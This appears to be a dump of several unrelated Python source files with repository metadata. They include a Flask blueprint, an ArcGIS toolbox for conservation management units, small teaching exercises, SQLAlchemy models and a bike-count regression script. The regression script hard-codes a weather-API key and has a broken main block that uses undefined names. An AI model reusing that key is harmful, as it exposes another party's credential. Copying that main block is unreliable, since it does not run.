from ..utils import to_snake_case
bp = Blueprint("components", __name__)
@bp.route("", methods=["GET"])
@bp.paginate(page=0)
def handle_list_components(pagination_parameters):
name = request.args.get('name')
total_rows = total_rows_components(name=name)
components = pagination_components(name=name,
page=pagination_parameters.page,
page_size=pagination_parameters.page_size)
response = {
'total': total_rows,
'components': components
}
return jsonify(response)
@bp.route("", methods=["POST"])
def handle_post_components():
"""Handles POST requests to /."""
kwargs = request.get_json(force=True)
kwargs = {to_snake_case(k): v for k, v in kwargs.items()}
component = create_component(**kwargs)
return jsonify(component)
@bp.route("<component_id>", methods=["GET"])
def handle_get_component(component_id):
"""Handles GET requests to /<component_id>."""
return jsonify(get_component(uuid=component_id))
@bp.route("<component_id>", methods=["PATCH"])
def handle_patch_component(component_id):
"""Handles PATCH requests to /<component_id>."""
kwargs = request.get_json(force=True)
kwargs = {to_snake_case(k): v for k, v in kwargs.items()}
component = update_component(uuid=component_id, **kwargs)
return jsonify(component)
@bp.route("<component_id>", methods=["DELETE"])
def handle_delete_component(component_id):
"""Handles DELETE requests to /<component_id>."""
return jsonify(delete_component(uuid=component_id))
| 32.964912 | 89 | 0.694518 |
9ec33186eb7b6cdb6b8c5328c5c97037f1e38781
| 19,617 |
pyt
|
Python
|
PGLMT_Tools/SpatialTools/CMU_Tool_v1.pyt
|
PNHP/PGLMT
|
faa5eb8f92771e37f777c580877d91334f2421fe
|
[
"MIT"
] | null | null | null |
PGLMT_Tools/SpatialTools/CMU_Tool_v1.pyt
|
PNHP/PGLMT
|
faa5eb8f92771e37f777c580877d91334f2421fe
|
[
"MIT"
] | null | null | null |
PGLMT_Tools/SpatialTools/CMU_Tool_v1.pyt
|
PNHP/PGLMT
|
faa5eb8f92771e37f777c580877d91334f2421fe
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------------
# Name: CMU Tool 1.0
# Purpose:
# Author: Molly Moore
# Created: 10/13/2021
#-------------------------------------------------------------------------------
######################################################################################################################################################
## Import packages and define environment settings
######################################################################################################################################################
import arcpy,os,sys,string
from getpass import getuser
import sqlite3 as lite
import pandas as pd
arcpy.env.overwriteOutput = True
arcpy.env.transferDomains = True
######################################################################################################################################################
## Define universal variables and functions
######################################################################################################################################################
def element_type(elcode):
"""Takes ELCODE as input and returns CMU element type code."""
if elcode.startswith('AAAA'):
et = 'AAAA'
elif elcode.startswith('AAAB'):
et = 'AAAB'
elif elcode.startswith('AB'):
et = 'AB'
elif elcode.startswith('AF'):
et = 'AF'
elif elcode.startswith('AM'):
et = 'AM'
elif elcode.startswith('AR'):
et = 'AR'
elif elcode.startswith('C') or elcode.startswith('H'):
et = 'CGH'
elif elcode.startswith('ICMAL'):
et = 'ICMAL'
elif elcode.startswith('ILARA'):
et = 'ILARA'
elif elcode.startswith('IZSPN'):
et = 'IZSPN'
elif elcode.startswith('IICOL02'):
et = 'IICOL02'
elif elcode.startswith('IICOL'):
et = 'IICOL'
elif elcode.startswith('IIEPH'):
et = 'IIEPH'
elif elcode.startswith('IIHYM'):
et = 'IIHYM'
elif elcode.startswith('IILEP'):
et = 'IILEP'
elif elcode.startswith('IILEY') or elcode.startswith('IILEW') or elcode.startswith('IILEV') or elcode.startswith('IILEU'):
et = 'IILEY'
elif elcode.startswith('IIODO'):
et = 'IIODO'
elif elcode.startswith('IIORT'):
et = 'IIORT'
elif elcode.startswith('IIPLE'):
et = 'IIPLE'
elif elcode.startswith('IITRI'):
et = 'IITRI'
elif elcode.startswith('IMBIV'):
et = 'IMBIV'
elif elcode.startswith('IMGAS'):
et = 'IMGAS'
elif elcode.startswith('I'):
et = 'I'
elif elcode.startswith('N'):
et = 'N'
elif elcode.startswith('P'):
et = 'P'
else:
arcpy.AddMessage("Could not determine element type")
et = None
return et
######################################################################################################################################################
## Begin toolbox
######################################################################################################################################################
class Toolbox(object):
def __init__(self):
"""Define the toolbox (the name of the toolbox is the name of the .pyt file)."""
self.label = "CMU Tools v1"
self.alias = "CMU Tools v1"
self.canRunInBackground = False
self.tools = [CreateCMU,FillAttributes]
######################################################################################################################################################
## Begin create CMU tool - this tool creates the core and supporting CMUs and fills their initial attributes
######################################################################################################################################################
class CreateCMU(object):
def __init__(self):
self.label = "1 Create CMU"
self.description = ""
self.canRunInBackground = False
def getParameterInfo(self):
site_name = arcpy.Parameter(
displayName = "Site Name",
name = "site_name",
datatype = "GPString",
parameterType = "Required",
direction = "Input")
site_desc = arcpy.Parameter(
displayName = "Site Description",
name = "site_desc",
datatype = "GPString",
parameterType = "Optional",
direction = "Input")
cpp_core = arcpy.Parameter(
displayName = "Selected CPP Core(s)",
name = "cpp_core",
datatype = "GPFeatureLayer",
parameterType = "Required",
direction = "Input")
cpp_core.value = r'CPP\CPP Core'
params = [site_name,site_desc,cpp_core]
return params
def isLicensed(self):
return True
def updateParameters(self, params):
return
def updateMessages(self, params):
return
def execute(self, params, messages):
site_name = params[0].valueAsText
site_desc = params[1].valueAsText
cpp_core = params[2].valueAsText
mem_workspace = "memory"
cmu = r"PGLMT_v2\\CMU"
spec_tbl = r"PNHP.DBO.CMU_SpeciesTable"
eo_reps = r'W:\\Heritage\\Heritage_Data\\Biotics_datasets.gdb\\eo_reps'
######################################################################################################################################################
## create CMU shape and get CMU attributes
######################################################################################################################################################
desc = arcpy.Describe(cpp_core)
if not desc.FIDSet == '':
pass
else:
arcpy.AddWarning("No CPP Cores are selected. Please make a selection and try again.")
sys.exit()
desc = arcpy.Describe(cmu)
if not desc.FIDSet == '':
arcpy.AddWarning("There is currently a selection on the CMU layer. Please clear the selection and try again.")
sys.exit()
else:
pass
arcpy.AddMessage("......")
# create list of eo ids for all selected CPPs that are current or approved
with arcpy.da.SearchCursor(cpp_core,["EO_ID","Status"]) as cursor:
eoids = sorted({row[0] for row in cursor if row[1] != "n"})
# create list of eo ids for all selected CPPs that are not approved
with arcpy.da.SearchCursor(cpp_core,["EO_ID","Status"]) as cursor:
excluded_eoids = sorted({row[0]for row in cursor if row[1] == "n"})
# add reporting messages about which CPPs are being excluded
if excluded_eoids:
arcpy.AddWarning("Selected CPPs with the following EO IDs are being excluded because they were marked as not approved: "+ ','.join([str(x) for x in excluded_eoids]))
else:
pass
# add reporting messages about which CPPs are being included and exit with message if no selected CPPs are current or approved.
if len(eoids) != 0:
arcpy.AddMessage("Selected CPPs with the following EO IDs are being used to create this CMU: "+','.join([str(x) for x in eoids]))
arcpy.AddMessage("......")
else:
arcpy.AddWarning("Your CPP selection does not include any current or approved CPPs and we cannot proceed. Goodbye.")
sys.exit()
# create sql query based on number of CPPs included in query.
if len(eoids) > 1:
sql_query = '"EO_ID" in {}'.format(tuple(eoids))
else:
sql_query = '"EO_ID" = {}'.format(eoids[0])
arcpy.AddMessage("Creating and attributing CMU core for site: "+ site_name)
arcpy.AddMessage("......")
# create cpp_core layer from selected CPPs marked as current or approved and dissolve to create temporary CMU geometry
cpp_core_lyr = arcpy.MakeFeatureLayer_management(cpp_core, "cpp_core_lyr", sql_query)
temp_cmu = os.path.join(mem_workspace,"temp_cmu")
temp_cmu = arcpy.Dissolve_management(cpp_core_lyr, temp_cmu)
# get geometry token from cmu
with arcpy.da.SearchCursor(temp_cmu,"SHAPE@") as cursor:
for row in cursor:
geom = row[0]
# calculate CMU_JOIN_ID which includes network username and the next highest tiebreaker for that username padded to 6 places
username = getuser().lower()
where = '"CMU_JOIN_ID" LIKE'+"'%{0}%'".format(username)
with arcpy.da.SearchCursor(cmu, 'CMU_JOIN_ID', where_clause = where) as cursor:
join_ids = sorted({row[0] for row in cursor})
if len(join_ids) == 0:
cmu_join_id = username + '000001'
else:
t = join_ids[-1]
tiebreak = str(int(t[-6:])+1).zfill(6)
cmu_join_id = username + tiebreak
# test for unsaved edits - alert user to unsaved edits and end script
try:
# open editing session and insert new CMU record
values = [site_name,"D",site_desc,cmu_join_id,geom]
fields = ["SITE_NAME","STATUS","BRIEF_DESC","CMU_JOIN_ID","SHAPE@"]
with arcpy.da.InsertCursor(cmu,fields) as cursor:
cursor.insertRow(values)
except RuntimeError:
arcpy.AddWarning("You have unsaved edits in your CMU layer. Please save or discard edits and try again.")
sys.exit()
######################################################################################################################################################
## Insert species records into CMU species table
######################################################################################################################################################
SpeciesInsert = []
# report which EOs were included in CMU and add EO records to list to be inserted into CMU species table
arcpy.AddMessage("The following species records have been added to the CMU Species Table for CMU with site name, "+site_name+":")
for eoid in eoids:
with arcpy.da.SearchCursor(eo_reps, ["ELCODE","ELSUBID","SNAME","SCOMNAME","EO_ID"], '"EO_ID" = {}'.format(eoid)) as cursor:
for row in cursor:
values = tuple([row[0],row[1],row[2],row[3],element_type(row[0]),row[4],cmu_join_id])
arcpy.AddMessage(values)
SpeciesInsert.append(values)
arcpy.AddMessage("......")
# insert EO records into CMU species table
for insert in SpeciesInsert:
with arcpy.da.InsertCursor(spec_tbl, ["ELCODE","ELSUBID","SNAME","SCOMNAME","ELEMENT_TYPE","EO_ID","CMU_JOIN_ID"]) as cursor:
cursor.insertRow(insert)
# report about EOs that overlap the CMU, but were not included in the CMU species table
eo_reps_full = arcpy.MakeFeatureLayer_management(eo_reps,"eo_reps_full")
arcpy.SelectLayerByLocation_management(eo_reps_full,"INTERSECT",temp_cmu,selection_type="NEW_SELECTION")
arcpy.AddWarning("The following EO rep records intersected your CMU, but do not have a CPP drawn:")
with arcpy.da.SearchCursor(eo_reps_full,["EO_ID","SNAME","SCOMNAME","LASTOBS_YR","EORANK","EO_TRACK","EST_RA","PREC_BCD"]) as cursor:
for row in cursor:
if row[0] not in eoids:
arcpy.AddWarning(row)
else:
pass
arcpy.AddMessage("......")
arcpy.AddMessage("The initial CMU was created for site name, "+site_name+". Please make any necessary manual edits. Once spatial edits are complete, don't forget to run step 2. Fill CMU Spatial Attributes")
######################################################################################################################################################
## Begin fill CMU spatial attributes tool which finishes attributes that depend on manual edits
######################################################################################################################################################
class FillAttributes(object):
def __init__(self):
"""Define the tool (tool name is the name of the class)."""
self.label = "2 Fill CMU Spatial Attributes"
self.description = ""
self.canRunInBackground = False
def getParameterInfo(self):
cmu = arcpy.Parameter(
displayName = "Selected CMU Layer",
name = "cmu",
datatype = "GPFeatureLayer",
parameterType = "Required",
direction = "Input")
cmu.value = r"PGLMT_v2\\CMU"
pgc_cover = arcpy.Parameter(
displayName = "PGC Cover Type Layer",
name = "pgc_cover",
datatype = "GPFeatureLayer",
parameterType = "Required",
direction = "Input")
params = [cmu,pgc_cover]
return params
def isLicensed(self):
return True
def updateParameters(self, params):
return
def updateMessages(self, params):
return
def execute(self, params, messages):
cmu = params[0].valueAsText
pgc_cover = params[1].valueAsText
mem_workspace = "memory"
# define paths
username = getuser().lower()
muni = r'C:\\Users\\'+username+r'\\AppData\\Roaming\\Esri\\ArcGISPro\\Favorites\\StateLayers.Default.pgh-gis0.sde\\StateLayers.DBO.Boundaries_Political\\StateLayers.DBO.PaMunicipalities'
pgl = r'C:\\Users\\'+username+r'\\AppData\\Roaming\\Esri\\ArcGISPro\\Favorites\\StateLayers.Default.pgh-gis0.sde\\StateLayers.DBO.Protected_Lands\\StateLayers.DBO.PGC_StateGameland'
boundaries_tbl = r"PNHP.DBO.CMU_PoliticalBoundaries"
cover_tbl = r"PNHP.DBO.PGC_CoverTypes"
# check for selection on CMU layer and exit if there is no selection
desc = arcpy.Describe(cmu)
if not desc.FIDSet == '':
pass
else:
arcpy.AddWarning("No CMUs are selected. Please make a selection and try again.")
sys.exit()
# create list of CMU Join IDs for selected CMUs
with arcpy.da.SearchCursor(cmu,["CMU_JOIN_ID"]) as cursor:
cmu_selected = sorted({row[0] for row in cursor})
# start loop to attribute each selected CMU
for c in cmu_selected:
arcpy.AddMessage("Attributing CMU: "+c)
arcpy.AddMessage("......")
# delete previous records in boundaries table if they have same CMU Join ID
with arcpy.da.UpdateCursor(boundaries_tbl,["CMU_JOIN_ID"]) as cursor:
for row in cursor:
if row[0] == c:
cursor.deleteRow()
# delete previous records in PGC cover types table if they have same CMU Join ID
with arcpy.da.UpdateCursor(cover_tbl,["CMU_JOIN_ID"]) as cursor:
for row in cursor:
if row[0] == c:
cursor.deleteRow()
# make feature layer of cmu join id in loop
sql_query = "CMU_JOIN_ID = '{}'".format(c)
cmu_lyr = arcpy.MakeFeatureLayer_management(cmu, "cmu_lyr", sql_query)
######################################################################################################################################################
## calculate acres for CMU
######################################################################################################################################################
# test for unsaved edits - alert user to unsaved edits and end script
try:
with arcpy.da.UpdateCursor(cmu_lyr,["ACRES","SHAPE@"]) as cursor:
for row in cursor:
acres = round(row[1].getArea("GEODESIC","ACRES"),3)
row[0] = acres
arcpy.AddMessage(c +" Acres: "+str(acres))
arcpy.AddMessage("......")
cursor.updateRow(row)
except RuntimeError:
arcpy.AddWarning("You have unsaved edits in your CMU layer. Please save or discard edits and try again.")
sys.exit()
######################################################################################################################################################
## attribute boundaries table
######################################################################################################################################################
# attribute the counties and municipalities based on those that intersect the CMU
boundary_union = arcpy.Intersect_analysis([muni,pgl],os.path.join(mem_workspace,"boundary_union"))
boundary_union_lyr = arcpy.MakeFeatureLayer_management(boundary_union,"boundary_union_lyr")
arcpy.SelectLayerByLocation_management(boundary_union_lyr,"INTERSECT",cmu_lyr,selection_type="NEW_SELECTION")
MuniInsert = []
with arcpy.da.SearchCursor(boundary_union_lyr,["CountyName","FullName","NAME"]) as cursor:
for row in cursor:
values = tuple([row[0].title(),row[1],"SGL "+row[2],c])
MuniInsert.append(values)
arcpy.AddMessage(c + " Boundaries: ")
for insert in MuniInsert:
with arcpy.da.InsertCursor(boundaries_tbl,["COUNTY","MUNICIPALITY","SGL","CMU_JOIN_ID"]) as cursor:
arcpy.AddMessage(insert)
cursor.insertRow(insert)
arcpy.AddMessage("......")
######################################################################################################################################################
## attribute pgc cover table
######################################################################################################################################################
# tabulate intersection to get percent and cover type that overlaps cmu
tab_area = arcpy.TabulateIntersection_analysis(cmu_lyr,arcpy.Describe(cmu_lyr).OIDFieldName,pgc_cover,os.path.join(mem_workspace,"tab_area"),"COVER_TYPE")
# insert name and percent overlap of protected lands
CoverInsert = []
with arcpy.da.SearchCursor(tab_area,["COVER_TYPE","PERCENTAGE"]) as cursor:
for row in cursor:
if row[0] is None:
pass
else:
values = tuple([row[0],round(row[1],2),c])
CoverInsert.append(values)
arcpy.AddMessage(c + " Cover Types: ")
if CoverInsert:
for insert in CoverInsert:
with arcpy.da.InsertCursor(cover_tbl,["COVER_TYPE","PERCENT_","CMU_JOIN_ID"]) as cursor:
arcpy.AddMessage(insert)
cursor.insertRow(insert)
else:
arcpy.AddMessage("No cover types overlap the CMU.")
arcpy.AddMessage("#########################################################")
arcpy.AddMessage("#########################################################")
######################################################################################################################################################
######################################################################################################################################################
| 47.26988 | 214 | 0.49136 |
7bbf8607b265b026762aad4945f2617ae6463ddd
| 570 |
py
|
Python
|
Licence 1/I22/TP 5/tp_5_1.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 8 |
2020-11-26T20:45:12.000Z
|
2021-11-29T15:46:22.000Z
|
Licence 1/I22/TP 5/tp_5_1.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | null | null | null |
Licence 1/I22/TP 5/tp_5_1.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 6 |
2020-10-23T15:29:24.000Z
|
2021-05-05T19:10:45.000Z
|
""" LECTURE D'UN FICHIER TEXTE """
"""
QUESTION 1
"""
with open("texte1", "r+") as f:
print(f.read(11), end="\n\n")
"""
QUESTION 2
"""
with open("texte1", "r+") as f:
print(f.readline(), end="\n\n")
f.readline()
print(f.readline(), end="\n\n")
"""
QUESTION 3
"""
with open("texte1", "r+") as f:
lines = f.readlines()
print(lines[1], lines[3])
"""
QUESTION 1
"""
with open("texte1", "r+") as f:
for i in range(3):
print(f.readline())
"""
QUESTION 2
"""
with open("texte1", "r+") as f:
print(f.read(3))
| 15.833333 | 35 | 0.508772 |
c8790e15303865c0b0baf5fa082a0c96c3fc3aa4
| 222 |
py
|
Python
|
project_9.py
|
cornelia247/cil-internship-cohort-01
|
b8184337056d378eab16d26b40b26ed58cd177bb
|
[
"MIT"
] | null | null | null |
project_9.py
|
cornelia247/cil-internship-cohort-01
|
b8184337056d378eab16d26b40b26ed58cd177bb
|
[
"MIT"
] | null | null | null |
project_9.py
|
cornelia247/cil-internship-cohort-01
|
b8184337056d378eab16d26b40b26ed58cd177bb
|
[
"MIT"
] | null | null | null |
from PIL import Image
def main():
filename ='py.png';
image = Image.open(filename);
image = image.copy()
size = width, height = image.size;
image.resize((400,100))
if (__name__ == '_main_'):
main()
| 22.2 | 38 | 0.608108 |
cdd0d71170bba8b813445c9e29298422b1e99a51
| 333 |
py
|
Python
|
src/onegov/feriennet/views/shared.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/views/shared.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/views/shared.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.user import User, UserCollection
from sqlalchemy import func
def users_for_select_element(request):
u = UserCollection(request.session).query()
u = u.with_entities(User.id, User.username, User.title, User.realname)
u = u.order_by(func.lower(User.title))
u = u.filter_by(active=True)
return tuple(u)
| 30.272727 | 74 | 0.735736 |
8d35d2407bdbf7ca4099ed4b2f0b491041cc2935
| 9,234 |
py
|
Python
|
Bikecounter/prediction.py
|
cfleschhut/virushack
|
2fe7ded0be8672b066edef7fed52573794db2ba5
|
[
"Apache-2.0"
] | 29 |
2020-03-21T00:47:51.000Z
|
2021-07-17T15:50:33.000Z
|
Bikecounter/prediction.py
|
cfleschhut/virushack
|
2fe7ded0be8672b066edef7fed52573794db2ba5
|
[
"Apache-2.0"
] | 7 |
2020-03-21T14:04:26.000Z
|
2022-03-02T08:05:40.000Z
|
Bikecounter/prediction.py
|
cfleschhut/virushack
|
2fe7ded0be8672b066edef7fed52573794db2ba5
|
[
"Apache-2.0"
] | 13 |
2020-03-21T01:08:08.000Z
|
2020-04-08T17:21:11.000Z
|
import json
import os
import pandas as pd
import numpy as np
from datetime import datetime
import statsmodels.formula.api as sm
from matplotlib import pyplot as plt
from statsmodels.iolib.smpickle import load_pickle
try:
# modifies path if used in ipython / jupyter
get_ipython().__class__.__name__
os.chdir(os.path.dirname(__file__))
except:
pass
class BikePrediction:
province_abbs = {
'Baden-Württemberg' : 'BW',
'Bayern' : 'BY',
'Berlin' : 'BE',
'Brandenburg' : 'BB',
'Bremen' : 'HB',
'Hamburg' : 'HH',
'Hessen' : 'HE',
'Mecklenburg-Vorpommern' : 'MV',
'Niedersachsen' : 'NI',
'Nordrhein-Westfalen' : 'NW',
'Rheinland-Pfalz' : 'RP',
'Saarland' : 'SL',
'Sachsen' : 'SN',
'Sachsen-Anhalt' : 'ST',
'Schleswig-Holstein' : 'SH',
'Thüringen' : 'TH'
}
def __init__(self):
self.dummies = ["month_" + str(i+1) for i in range(12)]
self.dummies.extend(["weekday_" + str(i) for i in range(7)])
def enrich_df(self, df):
""" Adds dummy variables to dataframe """
df["year"] = df.date.apply(lambda x: x.year)
df["month"] = df.date.apply(lambda x: x.month)
df["weekday"] = df.date.apply(lambda x: x.weekday())
if "bike_count" in df:
# only for training
df["bike_count"] = df.bike_count.astype("float16")
df = df.join(pd.get_dummies(df.weekday, prefix="weekday"))
month_columns = ['month_'+ str(i) for i in range(1,13)]
df = df.join(pd.get_dummies(df.month, prefix="month").reindex(columns=month_columns, fill_value=0))
# for d in self.dummies:
# df[d] = df[d.split("_")[0]].apply(lambda x: 1 if x == d.split("_")[1] else 0)
return df
def train(
self,
path_to_training_data="whole_json1.json",
out_path="prediction_parameters"):
""" This trains and saves a model for all stations found in
path.json file. Output folder defaults to /prediction_parameters."""
data_json = json.load(open(path_to_training_data, "r"))
data = pd.DataFrame(eval(data_json))
# take care of dtypes
data.date = data.date.apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
data.bike_count = pd.to_numeric(data.bike_count)
data.lon = pd.to_numeric(data.lon)
data.lat = pd.to_numeric(data.lat)
stations = data.name.unique()
for station in stations:
print("start training for station %s", station)
# load data and skip last row. Last row contains the overall sum.
df = data[data.name == station]
# define new columns for regression (happens inplace)
df = self.enrich_df(df)
# Perform regression but use data only until 2020-01-01
result = sm.ols(formula="""
bike_count ~
year +
month_1 +
month_2 +
month_3 +
month_4 +
month_5 +
month_6 +
month_7 +
month_8 +
month_9 +
month_10 +
month_11 +
month_12 +
weekday_0 +
weekday_1 +
weekday_2 +
weekday_3 +
weekday_4 +
weekday_5 +
weekday_6 +
temperature +
precipitation +
snowdepth +
windspeed +
sunshine +
is_holiday
""", data=df[(df.date < datetime(2020, 1, 1))]).fit()
result.save(os.path.join(out_path, station + ".model"))
# visualize
df["bike_count_prediction"] = result.predict(df)
df[(df.date > datetime(2019,1,1))].plot(
x="date",
y=["bike_count", "bike_count_prediction"],
linewidth=1,
title="""
trained with data until 2020-01-01 \n
displayed data from 2019 onwards \n
Station %s""" % station)
plt.ylabel("bike count")
plt.tight_layout()
plt.savefig(os.path.join(out_path, "prediction_%s.png" % station))
plt.close()
print("model and visualization saved to '%s'" % out_path)
def predict_single(self, station_string, day, temperature, precipitation, snowdepth, windspeed, sunshine, is_holiday, path_to_models="prediction_parameters" ):
""" Makes a prediction for a station_string and a given day """
if not type(day) == datetime:
raise "Please pass a proper datetime object."
df = pd.DataFrame([day], columns=["date"])
self.enrich_df(df)
for d in self.dummies:
if not d in df:
df[d] = 0
df["month_" + str(df.iloc[0].month)] = 1
df["weekday_" + str(df.iloc[0].weekday)] = 1
# load model and predict
model = load_pickle(os.path.join(path_to_models, station_string + ".model"))
df["prediction"] = model.predict(df)
# return prediction as plain number
return df.iloc[0]["prediction"]
def predict_series(self, station_string, days, temperatures, precipitations, snowdepths, windspeeds, sunshines, is_holidays, path_to_models="prediction_parameters" ):
""" Predict all given days. Returns a dataframe with date and prediction """
if not type(days) == pd.core.series.Series:
assert "Please pass days as a pandas Series. E.g. days = df['date']"
df = pd.DataFrame()
df["date"] = days
df['temperature']=temperatures
df['precipitation']=precipitations
df['snowdepth']=snowdepths
df['windspeed']=windspeeds
df['sunshine']=sunshines
df['is_holiday']=is_holidays
df = self.enrich_df(df)
model = load_pickle(os.path.join(path_to_models, station_string + ".model"))
df["prediction"] = model.predict(df)
return df[["date", "prediction"]]
if __name__ == "__main__":
# instance of class
BP = BikePrediction()
# run training on all classes
#BP.train()
lat = '48.130472'
lon = '11.581846'
date_day = datetime(2020,3,23)
stations = requests.get(
'https://api.meteostat.net/v1/stations/nearby?lat={}&lon={}&limit=20&key=L8ouyjgU'.format(lat,
lon))
#loop over next stations if current station has no data for today
for station in stations.json()['data']:
print('station_tried', station)
print(str(date_day).split()[0])
closest_station = station['id']
weather_data = requests.get(
'https://api.meteostat.net/v1/history/daily?station={}&start={}&end={}&key=L8ouyjgU'.format(closest_station,
str(date_day).split()[0],
str(date_day).split()[0]))
if weather_data.json()['data']:
print('last reading at station on: ', weather_data.json()['data'][-1]['date'])
print('date today', str(date_day).split()[0])
if weather_data.json()['data'] and weather_data.json()['data'][-1]['date'] == str(date_day).split()[0] :
break
list( myBigList[i] for i in [87, 342, 217, 998, 500] )
print(weather_data.json()['data'])
temperature, precipitation, snowdepth, windspeed, sunshine = list( weather_data.json()['data'][0][key] for key in ['temperature',
'precipitation',
'snowdepth',
'windspeed',
'sunshine'
])
province_public_holidays = []
geolocator = Nominatim(user_agent="specify_your_app_name_here")
location = geolocator.reverse(str(lat) + "," + str(lon))
#if state doesn't exist
if 'state' in location.raw['address']:
province = location.raw['address']['state']
else:
province = location.raw['address']['city']
province_abb = province_abbs[province]
print(date_day.year)
for date in holidays.DE(years=date_day.year, prov=province_abb):
province_public_holidays.append(str(date))
#print(station_weather_df)
is_holiday = [1 if str(date_day) in province_public_holidays else 0]
# make a single prediction
prediction = BP.predict_single(
station_string="Munich (DE)",
day=date_day,
temperature=temperature or 0,
precipitation=precipitation or 0,
snowdepth=snowdepth or 0,
windspeed=windspeed or 0,
sunshine=sunshine or 0,
is_holiday=is_holiday or 0
)
print(prediction)
df_munich = df_new[df_new['name']=='Munich (DE)']
BP.predict_series(
station_string="Munich (DE)",
days=df_munich.date,
temperatures=df_munich.temperature,
precipitations=df_munich.precipitation,
snowdepths=df_munich.snowdepth,
windspeeds=df_munich.windspeed,
sunshines=df_munich.sunshine,
is_holidays=df_munich.is_holiday
)
| 36.788845 | 169 | 0.568334 |
f52e7415b026da7a8ab020f38e84c9fb08a121c8
| 2,401 |
py
|
Python
|
INBa/2015/Ermashov_A_V/task_10_5.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Ermashov_A_V/task_10_5.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Ermashov_A_V/task_10_5.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
#Задача №10, Вариант 5
#Напишите программу "Генератор персонажей" для игры. Пользователю должно быть предоставлено 30 пунктов, которые можно распределить между четырьмя характеристиками: Сила, Здоровье, Мудрость и Ловкость. Надо сделать так, чтобы пользователь мог не только брать эти пункты из общего "пула", но и возвращать их туда из характеристик, которым он решил присвоить другие значения.
#Ермашов А.В.
#26.05.2016
print("Добро пожаловать в Генератор персонажей. У тебя есть 30 очков, а также 4 характеристики: Сила, Здоровье, Мудрость и Ловкость. Ты можете брать из общего числа пула и можешь возвращать их туда из характеристик. УДАЧИ!")
Sila=0
Zdorovye=0
Mudrosty=0
Lovkosty=0
ochki=30
chislo=0
print("Чтобы выбрать характеристику, просто напиши её так как она написана(начинай с заглавной буквы)")
while True:
if Sila<0 or Zdorovye<0 or Mudrosty<0 or Lovkosty<0 or ochki>30:
print("Ошибка")
break
elif ochki==0:
print("Все очки распределены. Их распределение:\nСила:",Sila,"\nЗдоровье:",Zdorovye,"\nМудрость:",Mudrosty,"\nЛовкость:",Lovkosty)
break
print("Ваши очки:\nСила:",Sila,"\nЗдоровье:",Zdorovye,"\nМудрость:",Mudrosty,"\nЛовкость:",Lovkosty,"\nНераспределённые очки:",ochki)
user_input=input("Введите характеристику:")
if user_input=="Сила" :
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Sila+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков")
elif user_input=="Здоровье":
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Zdorovye+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков" )
elif user_input=="Мудрость":
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Mudrosty+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков" )
elif user_input=="Ловкость":
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Lovkosty+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков" )
input("\nНажмите Enter для выхода.")
| 46.173077 | 372 | 0.747189 |
194249a70283ca015fe686021658a5a2c2c738a3
| 1,144 |
py
|
Python
|
LINE/2021/web/diveinternal/private/app/datamodel.py
|
mystickev/ctf-archives
|
89e99a5cd5fb6b2923cad3fe1948d3ff78649b4e
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
LINE/2021/web/diveinternal/private/app/datamodel.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
LINE/2021/web/diveinternal/private/app/datamodel.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-12-19T11:06:24.000Z
|
2021-12-19T11:06:24.000Z
|
import os
from datetime import date, datetime, timedelta
from sqlalchemy import create_engine, ForeignKeyConstraint
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer, Date, Table, Boolean, ForeignKey, DateTime, BLOB, Text, JSON, Float
from sqlalchemy.orm import relationship, backref
Base = declarative_base()
class Database:
SQLITE = 'sqlite'
DB_ENGINE = {
SQLITE: 'sqlite:///{DB}'
}
# Main DB Connection Ref Obj
dbEngine = None
sdbType = SQLITE
if sdbType in DB_ENGINE.keys():
engineUrl = DB_ENGINE[sdbType].format(DB=os.environ['DBFILE'])
dbEngine = create_engine(engineUrl,connect_args={'check_same_thread': False})
session = sessionmaker(bind=dbEngine,expire_on_commit=False)
else:
print("DBType is not found in DB_ENGINE")
class Subscriber(Base):
__tablename__ = 'Subscriber'
id = Column(Integer, primary_key=True)
email = Column(String)
date = Column(String)
def __init__(self, email, date):
self.email = email
self.date = date
| 29.333333 | 115 | 0.708916 |
2744ee99315c2d562075cfab9fe766fac90ae2f1
| 3,686 |
py
|
Python
|
app/__init__.py
|
MedPhyDO/app-skeleton
|
1161736ccf356c704c6c13b17fa11aca64b17dac
|
